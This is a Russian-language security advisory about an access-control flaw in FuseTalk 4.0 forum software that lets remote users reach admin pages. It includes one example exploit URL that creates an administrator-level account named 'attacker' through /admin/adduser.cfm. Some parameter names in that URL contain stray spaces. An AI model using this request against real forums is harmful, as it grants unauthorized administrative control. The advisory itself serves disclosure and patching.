Security Lab

Неавторизованный доступ в FuseTalk

Дата публикации:07.05.2004
Дата изменения:14.03.2009
Всего просмотров:1535
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: FuseTalk 2.x
FuseTalk 3.x
FuseTalk 4.x
Уязвимые версии: FuseTalk 4.0

Описание: Уязвимость в проверке правильности обнаружена в FuseTalk. Удаленный пользователь может получить доступ к административному интерфейсу.

Удаленный пользователь может получить доступ к 'banning.cfm' шаблону и заблокировать других пользователей. Пример:

http://[target]/admin/adduser.cfm?FTVAR_FIRSTNAME FRM=God&FTVAR_LASTNAMEFRM=God
&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass
&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFOR UMSFRM=0&FTVAR_USERTYPEFRM=g
&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70
&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RET URNERROR=Yes
&FT_ACTION=adduser

URL производителя:http://www.fusetalk.com/

Решение:Установите последнюю версию программы.

Ссылки: Fuse Talk Vunerabilities